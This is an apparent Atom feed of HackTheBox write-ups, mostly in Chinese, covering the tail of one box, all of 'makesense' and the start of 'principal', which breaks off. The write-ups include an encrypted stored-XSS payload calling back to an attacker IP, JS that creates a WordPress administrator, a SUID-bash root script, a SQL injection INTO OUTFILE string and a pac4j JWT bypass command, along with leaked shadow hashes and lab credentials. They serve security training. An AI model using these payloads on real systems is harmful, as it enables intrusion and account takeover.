[*] Step 1 : InstallFiles(SIMULATE=0x4, dummy) [async]
[*] Step 2 : InstallFiles(NONE=0x0, payload) [async]
[*] Waiting for dispatch (30 s max)...
[!] PK error 48: Failed to obtain authentication.
[*] Finished (exit=2, 0 ms)
[*] Loop ran for 37 ms
[*] Polling for payload (120 s max)...
[*] t+1s: payload=exists dpkg_lock=free suid=not yet
[*] t+2s: payload=exists dpkg_lock=free suid=not yet

[+] SUCCESS — SUID bash at t+1100ms
uid=1000(marimo) gid=1000(marimo) euid=0(root) groups=1000(marimo)
.suid_bash: cannot set terminal process group (-1): Inappropriate ioctl for device
.suid_bash: no job control in this shell
(remote) root@cohort:/home/marimo#
</code></pre>
<h1>root3d!</h1>
<pre><code>(remote) root@cohort:/root# cat /etc/shadow
root:$y$j9T$NyVfe7HDIJs5KIhAZn1r40$F58We2A4FJ7FL96d5wESpvR7T56dShAiCVuE5C5rrqD:20605:0:99999:7:::
insights:$y$j9T$6a6riZSRtZ4kTr56MDcLt1$6ykp6ipFj3fsNPCGBdZCi6EZ3VuCsxT10AuVoHXJsv5:20605::::::
marimo:$y$j9T$O0sZ4M1MX4ztZHZk3ggQO.$GVhu.vPHMss7D4npAVMcAXioAtjAtIU5yOGE7LtTSr/:20605:0:99999:7:::
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="HTB-writeup"/>
  </entry>
  <entry>
    <title>makesense-htb</title>
    <link href="https://0x5t4ckc47.github.io/posts/makesense-htb/makesense-htb/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/makesense-htb/makesense-htb/</id>
    <published>2026-08-04T00:00:00.000Z</published>
    <updated>2026-08-04T00:00:00.000Z</updated>
    <summary>Fuck</summary>
    <content type="html"><![CDATA[<h1>Recon</h1>
<pre><code>22/tcp   open     ssh         syn-ack ttl 63
80/tcp   filtered http        no-response
443/tcp  open     https       syn-ack ttl 63
8001/tcp filtered vcom-tunnel no-response
</code></pre>
<p>ttl 结果如下: 均为一跳, 端口背后服务均为主机, ttl 63 符合 Linux 一跳后的 ttl</p>
<pre><code>sudo lft 10.129.245.215:22
TTL LFT trace to smarthire.htb (10.129.245.215):22/tcp
 1  10.10.16.1 149.7ms

sudo lft 10.129.245.215:443
TTL LFT trace to smarthire.htb (10.129.245.215):443/tcp
 1  10.10.16.1 404.1ms
</code></pre>
<h1>Web - 443</h1>
<p>一个不知道干什么的公司, <code>Wappalyzer</code> 指出其使用 wordpress CMS
<img src="./web-443.png" alt="web-main-page" />
WP-Scan 指出该版本存在 <code>CVE-2026-63030</code> 漏洞, 即 <code>wp2shell</code>, 该漏洞会在末尾讨论</p>
<pre><code>[+] WordPress version 7.0 identified (Insecure, released on 2026-05-20).
 | Found By: Meta Generator (Passive Detection)
 |  - https://makesense.htb/, Match: 'WordPress 7.0'
 | Confirmed By: Atom Generator (Aggressive Detection)
 |  - https://makesense.htb/?feed=atom, &lt;generator uri="https://wordpress.org/" version="7.0"&gt;WordPress&lt;/generator&gt;
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: WP &lt; 7.0.2 - Facilitated SQLi
 |     Fixed in: 7.0.2
 |     References:
 |      - https://wpscan.com/vulnerability/82a6c423-547b-4910-aea5-044070b08949
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-60137
 |      - https://wordpress.org/news/2026/07/wordpress-7-0-2-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-fpp7-x2x2-2mjf
 |
 | [!] Title: WordPress &lt; 7.0.2 - REST API batch-route confusion and SQLi to RCE
 |     Fixed in: 7.0.2
 |     References:
 |      - https://wpscan.com/vulnerability/73310d64-e790-4a78-ab0a-12995b762dba
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-63030
 |      - https://wordpress.org/news/2026/07/wordpress-7-0-2-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q
</code></pre>
<p>底部有一个反馈栏, 没啥用
<img src="./web-comment.png" alt="comment" /></p>
<h2>Tech Stack</h2>
<p>技术栈如下: 服务器使用 apache server, 暂不考虑子域名爆破, 同时给出域名 <code>makesense.htb</code></p>
<pre><code>HTTP/1.1 500 Internal Server Error
Date: Tue, 04 Aug 2026 07:49:23 GMT
Server: Apache/2.4.58 (Ubuntu)
Link: &lt;https://makesense.htb/index.php?rest_route=/&gt;; rel="https://api.w.org/"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24379
</code></pre>
<p>添加域名后再次访问, 无区别</p>
<h2>JS analyse</h2>
<p>在检查页面源码时发现以下内容:</p>
<pre><code>&lt;script id="whisper-wrapper-js-extra"&gt;
var webagency_ajax = {"ajax_url":"https://makesense.htb/wp-admin/admin-ajax.php","nonce":"3259285fca","theme_url":"https://makesense.htb/wp-content/themes/webagency","site_url":"https://makesense.htb"};
//# sourceURL=whisper-wrapper-js-extra
&lt;/script&gt;
&lt;script id="whisper-wrapper-js" src="https://makesense.htb/wp-content/themes/webagency/assets/js/whisper/whisper-wrapper.js?ver=1.0"&gt;&lt;/script&gt;
&lt;script id="webagency-main-js" src="https://makesense.htb/wp-content/themes/webagency/assets/js/main.js?ver=1.0"&gt;&lt;/script&gt;
&lt;script id="wp-emoji-settings" type="application/json"&gt;
</code></pre>
<p>跟进得到 <code>https://makesense.htb/wp-content/themes/webagency/assets/js/whisper/whisper-wrapper.js</code>,</p>
<p>JS 中硬编码了密钥以及加密方式:</p>
<pre><code>const ENCRYPTION_KEY = 'bLs6z8iv3gWpsvyeabFosDjb4YQe7jdU13rI';
async encryptPayload(payload) {
        const encoder = new TextEncoder();
        const data = encoder.encode(JSON.stringify(payload));

        // Derive key from password using SHA-256
        const keyMaterial = await crypto.subtle.digest(
            'SHA-256',
            encoder.encode(ENCRYPTION_KEY)
        );

        const key = await crypto.subtle.importKey(
            'raw',
            keyMaterial,
            { name: 'AES-GCM' },
            false,
            ['encrypt']
        );

        // Generate random IV (12 bytes for AES-GCM)
        const iv = crypto.getRandomValues(new Uint8Array(12));

        // Encrypt
        const encrypted = await crypto.subtle.encrypt(
            { name: 'AES-GCM', iv: iv },
            key,
            data
        );

        // Combine IV + ciphertext (tag is appended automatically by WebCrypto)
        const combined = new Uint8Array(iv.length + encrypted.byteLength);
        combined.set(iv, 0);
        combined.set(new Uint8Array(encrypted), iv.length);

        // Convert to base64
        let binary = '';
        combined.forEach(byte =&gt; binary += String.fromCharCode(byte));
        return btoa(binary);
    }
</code></pre>
<p>整体逻辑为:</p>
<ol>
<li>获得语音输入的 <code>wav</code> 文件, 上传的服务器, 服务器返回一个 <code>postid</code></li>
<li>在本地进行转写和编码, 再次发送给服务器, 需要在参数中对应 <code>postid</code>,</li>
<li>服务器会在一个 POST 中展示文本和音频,</li>
</ol>
<p>服务端分别处理音频和文本, 即打印的文本是可控的, 在我们已知编码方式下可以构造 XSS 攻击, 加密代码如下:</p>
<pre><code>import json, base64, os, hashlib
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
key = hashlib.sha256(b"bLs6z8iv3gWpsvyeabFosDjb4YQe7jdU13rI").digest()
data = json.dumps({
    "transcription": '&lt;script src="http://10.10.16.174:1337/p.js"&gt;&lt;/script&gt;',
    "summary": "your summary here"
}, separators=(",", ":")).encode()
iv = os.urandom(12)
print(base64.b64encode(iv + AESGCM(key).encrypt(iv, data, None)).decode())
</code></pre>
<h2>XSS</h2>
<pre><code>curl -sk -X POST 'https://makesense.htb/wp-admin/admin-ajax.php' \
    -F 'action=save_voice_raw' \
    -F 'nonce=3259285fca' \
    -F 'voice_recording=@not_matter.wav;type=audio/wav;filename=voice-message.wav'

{"success":true,"data": { "message": "Audio saved, processing started." , "post_id":78}}
export token=$(python3 ./payload_construct.py)
curl -sk -X POST 'https://makesense.htb/wp-admin/admin-ajax.php' \
    -F 'action=save_voice_results' \
    -F "nonce=3259285fca" \
    -F "post_id=78" \
    -F "encrypted_payload=$token"

{"success":true,"data":{"message":"Results saved successfully!","post_id":78}}
</code></pre>
<p>同时做监听, 在本地挂一个创建 wp-admin 的js载荷:</p>
<pre><code>var x = new XMLHttpRequest();
x.open("GET", "/wp-admin/user-new.php", false);
x.send();
var match = /ser" value="([^"]*?)"/g.exec(x.responseText);
if (match) {
    var nonce = match[1];
    var params = "action=createuser&amp;_wpnonce_create-user=" + nonce + 
                 "&amp;user_login=stackcat&amp;email=admin@example.com&amp;pass1=stackcat123!&amp;pass2=stackcat123!&amp;role=administrator";
    var p = new XMLHttpRequest();
    p.open("POST", "/wp-admin/user-new.php", true);
    p.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    p.send(params);
}
var y = new XMLHttpRequest();
y.open("GET", "http://10.10.16.174:1337/pwned", false);
y.send();
</code></pre>
<p>在本地监听:</p>
<pre><code>::ffff:10.129.19.163 - - [04/Aug/2026 13:23:27] "GET /p.js HTTP/1.1" 200 -
::ffff:10.129.19.163 - - [04/Aug/2026 13:23:28] code 404, message File not found
::ffff:10.129.19.163 - - [04/Aug/2026 13:23:28] "GET /pwned HTTP/1.1" 404 -
</code></pre>
<p>用户创建成功, 登陆 Wordpress, 值得注意的一点时, 这个 worddpress 使用的数据库是 SQLlite
<img src="./wp-main.png" alt="wp-main" /></p>
<p>Google 一个 RCE 插件上传, 得到一个反弹 shell.</p>
<h1>shell as www-data</h1>
<pre><code>pwncat-vl -lp 4444
(local) pwncat$
(remote) www-data@makesense.htb:/var/www/html$ ls -liah
</code></pre>
<p>一些枚举, 查看 <code>wp-config.php</code>, 不过 wp 后端数据库为 <code>sqlite</code> 而不是 mysql:</p>
<pre><code>(remote) www-data@makesense.htb:/var/www/html$ cat wp-config.php
&lt;?php
// SQLite database configuration
define( 'DB_DIR', __DIR__ . '/wp-content/database/' );
define( 'DB_FILE', '.ht.sqlite' );

// Dummy MySQL settings (required but not used with SQLite)
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'walter' );
define( 'DB_PASSWORD', 'JbhHDAEgXvri3!' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );

$table_prefix = 'wp_';
define( 'WP_DEBUG', false );
...
</code></pre>
<p>用户以及组情况: 除去 root 和 www-data 有两个具有家目录且配置 shell 的用户, 没什么有趣的组权限</p>
<pre><code>(remote) www-data@makesense.htb:/var/www/html$ cat /etc/passwd|grep sh|grep home
walter:x:1000:1000:walter:/home/walter:/bin/bash
admin:x:1001:1001:,,,:/home/admin:/bin/bash
(remote) www-data@makesense.htb:/var/www/html$ id admin
uid=1001(admin) gid=1001(admin) groups=1001(admin),100(users)
(remote) www-data@makesense.htb:/var/www/html$ id walter
uid=1000(walter) gid=1000(walter) groups=1000(walter)
(remote) www-data@makesense.htb:/var/www/html$ id www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</code></pre>
<p>值得注意的是硬编码的数据库凭据: <code>walter:bhHDAEgXvri3!</code> 中的数据库用户与系统用户有重合, 可以测试密码费用, 但先完成枚举:</p>
<pre><code>(remote) www-data@makesense.htb:/var/www/html$ cat /etc/crontab
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
...
17 *	* * *	root	cd / &amp;&amp; run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.daily; }
47 6	* * 7	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.weekly; }
52 6	1 * *	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.monthly; }
#

(remote) www-data@makesense.htb:/var/www/html$ getcap -r / 2&gt;/dev/null
/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin,cap_sys_resource=p
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin,cap_sys_nice=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep

(remote) www-data@makesense.htb:/var/www/html$ find / -type f -perm -04000 -ls 2&gt;/dev/null
    14914     20 -rwsr-xr-x   1 root     root        18736 Apr 10 10:57 /usr/lib/polkit-1/polkit-agent-helper-1
...
   394750     16 -rwsr-xr-x   1 root     root          15232 May 26 20:39 /opt/google/chrome/chrome-sandbox

(remote) www-data@makesense.htb:/var/www/html$ systemctl list-timers
NEXT                            LEFT LAST                              PASSED UNIT                           ACTIVATES
Tue 2026-08-04 06:00:00 UTC 4min 37s Tue 2026-08-04 05:50:01 UTC     5min ago sysstat-collect.timer          sysstat-collect.service
Tue 2026-08-04 06:09:00 UTC    13min Tue 2026-08-04 05:39:01 UTC    16min ago phpsessionclean.timer          phpsessionclean.service
...
Mon 2026-08-10 15:56:34 UTC   6 days Mon 2026-05-25 19:28:58 UTC            - update-notifier-motd.timer     update-notifier-motd.service
</code></pre>
<p>没什么可以 quickwin 的权限、计划任务或timer, 不过其指出机器上装有 chrome, 在后续可以稍加关注</p>
<p>网络及端口情况:  一张网卡, 有端口扫描中显示 <code>filter</code> 的 <code>80, 8001</code> 端口</p>
<pre><code>(remote) www-data@makesense.htb:/var/www/html$ ss -lntp
State                    Recv-Q                   Send-Q                                       Local Address:Port
LISTEN                   0                        4096                                             127.0.0.1:8001
LISTEN                   0                        511                                                0.0.0.0:443
LISTEN                   0                        511                                                0.0.0.0:80
LISTEN                   0                        4096                                               0.0.0.0:22
LISTEN                   0                        4096                                         127.0.0.53%lo:53
LISTEN                   0                        4096                                            127.0.0.54:53
(remote) www-data@makesense.htb:/var/www/html$ ip a
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:2a:2f brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.19.163/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3225sec preferred_lft 3225sec
</code></pre>
<h1>shell as walter</h1>
<p>在枚举完成后尝试凭据复用:</p>
<pre><code>ssh walter@makesense.htb
The authenticity of host 'makesense.htb (10.129.19.163)' can't be established.
ED25519 key fingerprint is: SHA256:ZuPyKYvneacLwQJfW7aR8rIt6ppYCS22aWYI5nO3Ddk
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'makesense.htb' (ED25519) to the list of known hosts.
walter@makesense.htb's password:
...
walter@makesense:~$ whoami
walter
walter@makesense:~$ curl -s 127.0.0.1:80 |tail -n 4
&lt;body id="error-page"&gt;
	&lt;div class="wp-die-message"&gt;&lt;p&gt;There has been a critical error on this website.&lt;/p&gt;&lt;p&gt;&lt;a href="https://wordpress.org/documentation/article/faq-troubleshooting/"&gt;Learn more about troubleshooting WordPress.&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;/body
&lt;/html&gt;
walter@makesense:~$ curl -sk https://127.0.0.1:443 |tail -n 4
&lt;body id="error-page"&gt;
	&lt;div class="wp-die-message"&gt;&lt;p&gt;There has been a critical error on this website.&lt;/p&gt;&lt;p&gt;&lt;a href="https://wordpress.org/documentation/article/faq-troubleshooting/"&gt;Learn more about troubleshooting WordPress.&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;/body
&lt;/html&gt;
</code></pre>
<p><code>80</code> 和 <code>443</code> 一个站点, 查看 <code>8001</code>: 需要认证的以 root 权限运行的 ocr4 程序, 语言使用 <code>PHP8.3.6</code></p>
<pre><code>walter@makesense:~$ curl -v 127.0.0.1:8001
*   Trying 127.0.0.1:8001...
* Connected to 127.0.0.1 (127.0.0.1) port 8001
&gt; GET / HTTP/1.1
&gt; Host: 127.0.0.1:8001
&gt; User-Agent: curl/8.5.0
&gt; Accept: */*
&gt;
* HTTP 1.0, assume close after body
&lt; HTTP/1.0 401 Unauthorized
&lt; Host: 127.0.0.1:8001
&lt; Date: Tue, 04 Aug 2026 06:06:48 GMT
&lt; Connection: close
&lt; X-Powered-By: PHP/8.3.6
&lt; Set-Cookie: PHPSESSID=rc4anghh65itfut65ptgjrafj1; path=/
&lt; Expires: Thu, 19 Nov 1981 08:52:00 GMT
&lt; Cache-Control: no-store, no-cache, must-revalidate
&lt; Pragma: no-cache
&lt; WWW-Authenticate: Basic realm="OCR Protected"
&lt; Content-type: text/html; charset=UTF-8
&lt;
* Closing connection
Authentication required.

walter@makesense:~$ ps -ef|grep 8001
root        1404    1397  0 04:09 ?        00:00:00 php -S 127.0.0.1:8001 -t /root/ocr4/
</code></pre>
<p>尝试复用 <code>walter</code> 凭据: 认证成功, 有 html 页面, 做端口转发</p>
<pre><code>walter@makesense:~$ curl -u walter:'JbhHDAEgXvri3!' 127.0.0.1:8001
&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
...

</code></pre>
<p><img src="./8001-main.png" alt="8001-main" />
Wow, 你 画 我 猜!
尝试画一个 hello, 有一个保存按钮, 可以自由输入文件名和后缀名, 按下后给出了路径: <code>saved\hallo.txt</code>, 换个后缀名呢? 有趣的是, 其可以以 PHP 作为后缀名.</p>
<pre><code>curl -u walter:'JbhHDAEgXvri3!' http://127.0.0.1:8001/saved/hello.txt
hello
</code></pre>
<p><img src="./8001-traffic-1.png" alt="8001-traffic" />
在浏览器中观察网络流量, 发现其向服务器提交 <code>"canvas_image": "data:image/png;base64,[data]</code> , 服务器会返回包含保存文件的 HTML, 同时给出一个 OCR_id:</p>
<pre><code>
            &lt;form method="post"&gt;
                &lt;p class="caption"&gt;Save as&lt;/p&gt;
                &lt;input type="hidden" name="ocr_id" value="ocr_6a71864c74ab91.68766683"&gt;
                &lt;div class="save-row"&gt;
                    &lt;input type="text" name="filename" placeholder="result.txt" required&gt;
                    &lt;button type="submit" name="save_output" class="solid-btn"&gt;Save&lt;/button&gt;
                &lt;/div&gt;
            &lt;/form&gt;
        &lt;/div&gt;
</code></pre>
<p>最终保存请求格式为: <code>POST</code> body: <code>ocr_id=ocr_6a71868bd8ceb7.27898801&amp;filename=222&amp;save_output=</code> 最终保存文件为  <code>saved\filename</code></p>
<h2>construct php shell image:</h2>
<p>最佳方法为写入 PHP oneline, 即 <code>&lt;?php system("/tmp/k" );?&gt;</code> 最大化减少特殊字符</p>
<pre><code># k:
cp /bin/bash /tmp/o
chown root:root /tmp/o
chmod +s /tmp/o
</code></pre>
<p>但是, 经过测试其对常见字体的特殊字符的识别能力和一只成年香蕉没有明显区别, 尤其是 <code>/tmp/k</code> 部分, 在搜索最适合 ocr 识别的字体后我找到这篇文章:
https://stackoverflow.com/questions/316068/what-is-the-ideal-font-for-ocr</p>
<p>其中有这样一个回答:
:::note
It really depends on the OCR engine considered.
For gocr, FreeMono is the best, see gocr documentation.
For tesseract, DejaVu-Serif works well, see https://superuser.com/a/1543382/280936
For abbyocr, verdana is good, see this comparison
See also this wrap-up: https://www.monperrus.net/martin/perfect-ocr-digital-data
:::</p>
<p>为了尽可能简化流程(节约token), 最好优先找到本机的 ocr: 结果显示其为  <code>tesseract-ocr</code>, 对应的最佳识别字体为 DejaVu-Serif</p>
<pre><code>walter@makesense:/tmp$ find / -name '*ocr*' -ls 2&gt;/dev/null
   158376      4 drwxr-xr-x   4 root     root         4096 Aug  4 06:10 /root/ocr4
   139998      4 -rwxr-xr-x   1 root     root          156 Jun  5 10:50 /root/.scripts/start_ocr4.sh
   310392      4 drwxr-xr-x   3 root     root         4096 May 25 19:38 /usr/share/tesseract-ocr
   310404      4 -rw-r--r--   1 root     root           40 Apr  7  2024 /usr/share/tesseract-ocr/5/tessdata/configs/hocr
   311307      4 drwxr-xr-x   2 root     root         4096 May 25 19:38 /usr/share/doc/tesseract-ocr-eng
   311317      4 drwxr-xr-x   2 root     root         4096 May 25 19:38 /usr/share/doc/tesseract-ocr
   311312      4 drwxr-xr-x   2 root     root         4096 May 25 19:38 /usr/share/doc/tesseract-ocr-osd
</code></pre>
<p>之后就是把格式喂给 AI 让它自己测试, 最终得到这张图片:
<img src="./payload.png" alt="what the fuck is it?" /></p>
<h1>root3d!</h1>
<pre><code>o-5.2# cat /etc/shadow
root:$y$j9T$oBMykAbyiOXMRmKow26tM0$k1tS0gbfGLr/iaC9BiWBsKCkC2G129/fuXrB1NZH9v4:20605:0:99999:7:::
</code></pre>
<h2>beyond root - wp2shell</h2>
<p><code>CVE-2026-63030</code> 漏洞实际上无法利用:</p>
<pre><code>./wp2shell-scan.py exploit -u https://makesense.htb --i-have-authorization
[•] CVE-2026-63030 - WordPress Core wp2shell RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[*] https://makesense.htb/ -- exploit (file: wp2shell-phpinfo-f7e74d38.php)
    [*] trying OUTFILE path: /var/www/html/wp2shell-phpinfo-f7e74d38.php
    [*] batch response: 207, 1.41s
    [-] https://makesense.htb/wp2shell-phpinfo-f7e74d38.php -&gt; HTTP 500
    [-] Exploit not confirmed. Likely causes:
        * site patched (6.9.5+ / 7.0.2+)
        * MySQL FILE privilege missing or secure_file_priv blocks write
        * webroot path differs — retry with --webroot
        * WAF blocking /batch/v1
</code></pre>
<p>该漏洞部分描述如下:
:::note
Where the database user holds the FILE privilege, this leads to remote code execution via SELECT ... INTO OUTFILE. No plugins are required. A stock WordPress install is affected.
:::</p>
<p>漏洞利用需要使用 <code>INTO OUTFILE</code> 将数据写入磁盘, 但该机器使用 sqlite 作为后端数据库, 在Wordpress 上使用 sqlite 依赖 <code>SQLite Database Integration</code> 插件, 其相当于一个 MySQL2SQLite 翻译器, 注入仍然需要使用 MYSQL 语法</p>
<p>RCE 的注入点如下:</p>
<pre><code>1) OR 1=1 LIMIT 1 INTO OUTFILE '&lt;webroot&gt;/&lt;name&gt;.php' LINES TERMINATED BY '&lt;?php ...?&gt;'-- -
</code></pre>
<p>然而, <code>INTO OUTFILE '&lt;webroot&gt;/&lt;name&gt;.php' LINES TERMINATED BY</code> 是 MySQL 的独有语法, 该插件无法将其翻译为 Sqlite 语法, 因而 RCE 无效</p>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="HTB-writeup"/>
  </entry>
  <entry>
    <title>principal-htb</title>
    <link href="https://0x5t4ckc47.github.io/posts/principal-htb/principal-htb/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/principal-htb/principal-htb/</id>
    <published>2026-08-03T00:00:00.000Z</published>
    <updated>2026-08-03T00:00:00.000Z</updated>
    <summary>HackTheBox principal Linux Medium</summary>
    <content type="html"><![CDATA[<h1>Recon</h1>
<p>Nmap, 两个端口: <code>22, 8080</code></p>
<pre><code>22/tcp   open  ssh        syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy syn-ack Jetty
</code></pre>
<h1>8080 - Jetty</h1>
<p>一个 CICD 管理页面
<img src="principal-8080-init.png" alt="8080-main-page" />
密码重置功能仍在实现, 推测自行实现的 CICD 页面, 页面底部小字: &lt;font color="#fac08f"&gt;v1.2.0 | Powered by pac4j&lt;/font&gt;
对 <code>static/js/app.js</code> 进行分析, 有以下端点, 需要认证:</p>
<pre><code>const API_BASE = '';
const JWKS_ENDPOINT = '/api/auth/jwks';
const AUTH_ENDPOINT = '/api/auth/login';
const DASHBOARD_ENDPOINT = '/api/dashboard';
const USERS_ENDPOINT = '/api/users';
const SETTINGS_ENDPOINT = '/api/settings';
</code></pre>
<h2>TechSTack</h2>
<pre><code>HTTP/1.1 200 OK
Date: Wed, 29 Jul 2026 11:00:13 GMT
Server: Jetty
X-Powered-By: pac4j-jwt/6.0.3
Content-Language: en-US
Content-Type: text/html;charset=utf-8
Content-Length: 6152
</code></pre>
<p>技术栈给出了版本信息: <code>pac4j-jwt/6.0.3</code>, 十分甚至九分有趣</p>
<h2>CVE-2026-29000</h2>
<p>公开利用聚焦在 <a href="https://github.com/alihussainzada/CVE-2026-29000-Python-PoC-pac4j-JWT-AuthenticationBypass-Poc">CVE-2026-29000</a> 上:</p>
<p>:::quote
The vulnerability allows attackers to authenticate as arbitrary users by sending a malicious <strong>JWE token containing an unsigned PlainJWT (<code>alg: none</code>)</strong>.
:::</p>
<p>利用需要公开的 <code>JWKS</code> 公钥, 恰好 <code>const JWKS_ENDPOINT = '/api/auth/jwks';</code>
对于需要伪造的 body 字段其中也有提及:</p>
<pre><code>const ROLES = {
    ADMIN: 'ROLE_ADMIN',
    MANAGER: 'ROLE_MANAGER',
    USER: 'ROLE_USER'
};
</code></pre>
<pre><code>python3 ./poc.py --jwks http://10.129.15.87:8080/api/auth/jwks --user admin --role ROLE_ADMIN
[*] Fetching JWKS...
[+] Public key loaded
[+] PlainJWT created

=== Malicious JWE Token ===

..too long..
</code></pre>
<h2>AfterAuth</h2>
<p>对于 <code>/api/users</code> 端点, 其指出 <code>svc_deploy</code> 可以通过 ssh 登陆:</p>
<pre><code>{
	"active":true,
	"lastLogin":"2025-12-28T14:32:00Z",
	"id":2,
	"department":"DevOps",
	"displayName":"Deploy Service",
	"email":"svc-deploy@principal-corp.local",
	"username":"svc-deploy",
	"note":"Service account for automated deployments via SSH certificate auth.",
	"role":"deployer"
}
</code></pre>
<p>以及一个域名: <code>principal-corp.local</code>, 但 ffuf 未找到子域名</p>
<p>在 <code>/api/settings</code> 中发现了一些有趣的信息, 包括用于签名 JWT 的密钥</p>
<pre><code>{
"infrastructure":{
	"database":"H2 (embedded)",
	"sshCertAuth":"enabled",
	"sshCaPath":"/opt/principal/ssh/",
	"notes":"SSH certificate auth configured for automation - see /opt/principal/ssh/ for CA config."},
	
"security":{
	"authFramework":"pac4j-jwt",
	"authFrameworkVersion":"6.0.3",
	"jwtAlgorithm":"RS256",
	"jweAlgorithm":"RSA-OAEP-256",
	"jweEncryption":"A128GCM",
	"encryptionKey":"D3pl0y_$$H_Now42!",
	"tokenExpiry":"3600s",
	"sessionManagement":"stateless"
}
</code></pre>
<p>以及我们知道在 <code>/opt/principal/ssh/</code> 下存放着 SSH 的 CA 设置, 或许会有可以签名任意证书的根密钥</p>
<p>观察 JWT 密钥, 发现其和 DEPLOY 以及 SSH 等关键字有重复, 尝试 ssh</p>
<pre><code>ssh svc-deploy@10.129.244.220
svc-deploy@10.129.244.220's password: 
'
svc-deploy@principal:~$ whoami
svc-deploy
</code></pre>
<h1>shell as svc_deploy</h1>
<p>权限以及用户情况</p>
<pre><code>svc-deploy@principal:~$ id
uid=1001(svc-deploy) gid=1002(svc-deploy) groups=1002(svc-deploy),1001(deployers)
svc-deploy@principal:~$ cat /etc/passwd|grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
svc-deploy:x:1001:1002::/home/svc-deploy:/bin/bash
</code></pre>
<p>网络情况, 省略过多内容, 一张网卡, 无有趣的仅本地端口</p>
<pre><code>svc-deploy@principal:~$ ss -lntp
127.0.0.54:53  
0.0.0.0:22 
127.0.0.53%lo:53
*:8080
[::]:22
svc-deploy@principal:~$ ip a
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:32:2c brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.244.220/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3109sec preferred_lft 3109sec
</code></pre>
<p>两个用户, <code>root</code> 和 <code>svc-deploy</code>, 其中 <code>svc-deploy</code> 还属于 <code>deploy</code> 组, 查找该组拥有的文件或目录</p>
<pre><code>svc-deploy@principal:~$ find / -group deployers -ls 2&gt;/dev/null
      547      4 -rw-r-----   1 root     deployers      168 Mar 10 14:35 /etc/ssh/sshd_config.d/60-principal.conf
    20398      4 drwxr-x---   2 root     deployers     4096 Mar 11 04:22 /opt/principal/ssh
    20498      4 -rw-r-----   1 root     deployers      288 Mar  5 21:05 /opt/principal/ssh/README.txt
    20499      4 -rw-r-----   1 root     deployers     3381 Mar  5 21:05 /opt/principal/ssh/ca
</code></pre>
<p>这和在 Web 页面得到的信息相匹配</p>
<h2>SSH CA analyst</h2>
<p>在 <code>/opt/principal/ssh</code> 下有</p>
<pre><code>svc-deploy@principal:/opt/principal/ssh$ ls
README.txt  ca  ca.pub
</code></pre>
<p>传输到本地, 对证书中间部分进行 base64 解码:</p>
<pre><code>cat ssh_cakey|sed '1d;$d'|base64 -d|xxd
00000970: 6f8d 74e4 7cc5 3900 0000 1070 7269 6e63  o.t.|.9....princ
00000980: 6970 616c 2d73 7368 2d63 6101 0203       ipal-ssh-ca...
</code></pre>
<p>:::note
